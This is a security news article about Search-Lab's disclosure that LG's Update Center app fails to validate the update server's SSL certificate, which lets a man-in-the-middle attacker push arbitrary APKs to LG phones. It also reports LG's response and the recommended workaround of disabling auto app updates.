Researcher Says LG App Update Mechanism Doesn’t Verify SSL Cert

Many smartphones manufactured by LG contain a vulnerability that can allow an attacker to replace an APK file with a malicious file of his choice.

The problem is the result of several conditions on LG phones. Like other manufacturers, LG includes custom apps on its handsets, which are not available through the normal Google Play store. The apps are pre-loaded and have a separate update mechanism that relies on contacting an LG server to download new code. Researchers at Search-Lab in Hungary found that the update process for these apps does not validate the security certificate presented by the server on the other end, opening users up to man-in-the-middle attacks.

“Since new applications and/or application upgrades are installed through this channel in APK form without the need for any additional confirmation from the user, a malicious attacker can abuse the functionality to install arbitrary applications into the victim smart phones. These applications might use any permission (except the ones requiring signature by system key), effectively circumventing Android’s own platform security,” Search-Lab wrote in an explanation of the vulnerability.

The process is controlled on LG phones by the Update Center app, and when the app looks for new updates, it contacts the server at lgcpm.com. The app is designed to install updates automatically, and the researchers say that an attacker in a MITM position would be able to hijack the connection silently and replace a target app with a malicious one.

“When fetching new applications, the client looks for the ‘appUrl’ field, which holds a base64 encoded, encrypted URL. The encryption key is symmetric, it is based on the certKey field, which is part of the same message. Since there is no integrity protection applied to the messages, an attacker can intercept the update response and replace the value of appUrl with any arbitrary URL pointing to a potentially malicious APK,” the researchers said.

“This way the handset fetches the APK file controlled by the attacker without the user’s knowledge. This can even occur in the background, when the Update Center believes that a new version of an LG application is available.”

Search-Lab reported the vulnerability to LG in November and said that the vendor plans to fix the bug only in new handsets and won’t push a fix to existing phones. As a workaround, they recommend turning off the “Auto app update” function on affected LG handsets.

“Since smart phone vendors need approval of carriers for every single application update and in this case most of LG’s products are affected; LG made a business decision and they don’t provide the fix for most of their customers, at least ‘for the time being’,” Imre Rad of Search-Lab said by email.

LG officials said they are looking into the details of the report.

Suggested articles